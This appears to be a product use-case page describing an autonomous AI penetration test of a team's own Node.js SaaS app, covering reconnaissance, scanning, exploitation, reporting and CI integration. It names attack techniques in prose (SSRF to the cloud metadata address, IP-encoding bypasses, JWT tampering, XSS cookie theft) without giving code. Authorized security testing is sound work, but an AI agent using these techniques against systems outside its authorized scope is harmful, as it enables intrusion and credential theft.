Secure a Web App with Autonomous AI Penetration Testing

The Problem

Dani's team ships code twice a week to their SaaS platform — a Node.js API with a React frontend serving 5,000 users. Their last professional penetration test was 9 months ago and cost $15,000. Since then, they've added 40+ API endpoints, integrated a payment system, and launched a webhook feature that fetches user-provided URLs. They know they need another pentest, but the budget isn't there for another manual engagement, and they can't afford to wait. Every deploy is a potential new vulnerability shipping to production.

Dani wants to run a comprehensive penetration test this week — not a surface-level vulnerability scan, but actual exploitation attempts that prove whether vulnerabilities are real. The test needs to cover the OWASP Top 10, produce a report with reproducible proof-of-concept exploits, and integrate into CI so future deploys are tested automatically.

The Solution

Use ai-pentesting (Shannon) as the autonomous orchestrator, supported by subfinder for subdomain discovery, whatweb for technology fingerprinting, nmap-recon for port scanning, nuclei-scanner for known CVE detection, schemathesis for API fuzzing, and xss-detection and ssrf-detection techniques for targeted exploitation. The AI agent coordinates all tools, analyzes results, decides what to exploit, and generates a professional report.

Step-by-Step Walkthrough

Step 1: Map the Attack Surface

Before testing anything, understand what exists. The attack surface includes not just the main application but every subdomain, every port, and every API endpoint.

Start with subdomain enumeration using subfinder. Even for a single-domain SaaS, there are often forgotten subdomains — staging environments with debug mode enabled, old API versions with known vulnerabilities, internal tools accidentally exposed. Subfinder queries certificate transparency logs, DNS datasets, and other passive sources without touching the target infrastructure.

Run the results through whatweb to fingerprint every live host. For each subdomain, identify the web server (Nginx 1.24, Node.js 18), backend framework (Express, Next.js), and any exposed technologies (Redis admin panel, Kibana dashboard). This tells the AI pentester which attack techniques are most likely to succeed — finding a WordPress installation means testing for plugin vulnerabilities, finding an Express API means testing for prototype pollution and NoSQL injection.

Then run nmap against all live hosts to find open ports beyond HTTP. Common findings: Redis on port 6379 without auth, MongoDB on 27017 accessible from the internet, debug ports left open (Node.js inspector on 9229). These aren't web vulnerabilities, but they're often the easiest path to compromise.

The combined output — subdomains, technologies, and open ports — gives the AI a complete map to plan its attack strategy.

Step 2: Scan for Known Vulnerabilities

Before investing time in manual exploitation, check for low-hanging fruit. Run nuclei with templates for known CVEs, default credentials, and common misconfigurations. Nuclei has thousands of templates maintained by the security community — it can find things like exposed .env files, open admin panels, outdated jQuery with known XSS, or servers vulnerable to published CVEs.

For the API specifically, run schemathesis against the OpenAPI spec. Schemathesis generates thousands of test cases from the schema — boundary values, invalid types, oversized payloads, special characters — and fires them at every endpoint. It finds crashes (500 errors), schema violations (response doesn't match spec), and slow responses (potential DoS vectors) that human testers rarely discover because they don't test exhaustively.

Focus schemathesis on the payment and webhook endpoints — these handle the most sensitive data and the most complex input validation. If the webhook endpoint accepts a URL parameter and schemathesis gets a 500 error with a specially crafted URL, that's a strong SSRF indicator for the AI to investigate further.

Step 3: AI-Guided Exploitation

This is where autonomous AI pentesting shines. Feed the reconnaissance data and scan results into Shannon (or a custom AI pipeline). The AI analyzes all findings and decides what to exploit first, based on:

Likelihood of exploitation: A 500 error on a SQL-parameterized endpoint is more promising than a minor header misconfiguration
Impact: An auth bypass on the admin API is critical; a reflected XSS in a 404 page is low
Effort: Known CVE with public exploit code is faster than discovering a novel vulnerability

The AI agent starts with the highest-priority targets. For the webhook endpoint that accepts URLs, it tests for SSRF — can it reach the AWS metadata service at 169.254.169.254? Can it access internal services on the private network? It tries filter bypasses: IP encoding (0x7f000001 for 127.0.0.1), DNS rebinding, protocol smuggling. If any bypass works, the agent captures the exact request and response as proof.

For the authentication system, the agent tests for broken access control: can a regular user access admin endpoints by changing the user ID in the JWT? Can they escalate privileges by modifying role fields in the profile update? The AI reasons about the application's auth model based on the source code (white-box testing) and crafts specific exploitation attempts.

For XSS, the agent identifies all input points (search, comments, user profile fields) and tests each in context. It doesn't just fire generic payloads — it analyzes where the input appears in the response (HTML body, attribute, JavaScript context, URL) and selects the appropriate bypass technique. When it finds a working XSS, it demonstrates impact: session cookie theft, keylogging, or phishing overlay.

Each exploitation attempt is recorded with the full request, response, and a curl command that reproduces it. No false positives — every finding in the report has a working proof-of-concept.

Step 4: Generate the Report

The AI compiles all findings into a structured penetration test report. Each vulnerability includes:

Severity rating with CVSS score
Affected endpoint and parameter
Step-by-step reproduction using curl or browser
Screenshot or response body showing the exploit working
Impact description (what an attacker could do)
Remediation guidance specific to the codebase

The executive summary prioritizes by risk: critical findings that need immediate patches (auth bypass, SQL injection, SSRF to metadata), high findings for the next sprint (stored XSS, missing rate limiting), and medium findings for the backlog (security header improvements, verbose error messages).

Step 5: Integrate into CI/CD

After fixing the findings, set up automated pentesting in the CI pipeline. Every push to main triggers a pentest against the freshly deployed staging environment. The pipeline:

Deploys the app to a temporary staging environment
Runs the AI pentest with a focused scope (30-minute time limit for CI)
Uploads the report as a build artifact
Fails the build if any critical or high severity vulnerabilities are found
Sends a Slack notification with the summary

For weekly scheduled runs (not gated on deploy), the pentest runs with the full scope — comprehensive recon, maximum fuzzing intensity, and complete exploitation attempts. This catches regressions and new attack surface that appeared during the week.

Real-World Example

Dani, a lead developer at a 20-person SaaS startup, runs their first AI-driven pentest against their staging environment on a Monday morning. The full pipeline completes in 2 hours — less time than it takes to write the SOW for a manual engagement.

Subfinder discovers 12 subdomains, including a forgotten staging.api.example.com with debug mode enabled
WhatWeb fingerprints all live hosts — the staging API is running an outdated Express version with known prototype pollution CVE
Nuclei finds 3 exposed .env files and an open Redis instance on port 6379
Schemathesis fuzzes 40 API endpoints and triggers 500 errors on 6 of them with special characters
Shannon's AI agent chains the findings: the webhook endpoint has SSRF that leaks AWS IAM credentials from the metadata service, a broken access control bug lets any user read other users' payment data, and a stored XSS in the support ticket system fires when an admin views it

The team fixes all 3 critical findings in 48 hours. The CI integration catches a regression the following week — a new endpoint missing authorization checks. Total cost: ~$30 in API usage per full pentest. Security gap between deploys drops from 6+ months to zero.

Related Skills

nmap-recon — Network port scanning and service detection for the reconnaissance phase
nuclei-scanner — Template-based vulnerability scanning for known CVEs and misconfigurations
owasp-zap — Web application security scanner for comprehensive vulnerability assessment
security-audit — Code-level security scanning for OWASP Top 10 vulnerabilities

LIVETry this use case on your own files

Skills stack · 8 skills

ai-pentesting

subfinder

whatweb

schemathesis

xss-detection

ssrf-detection

nmap-recon

nuclei-scanner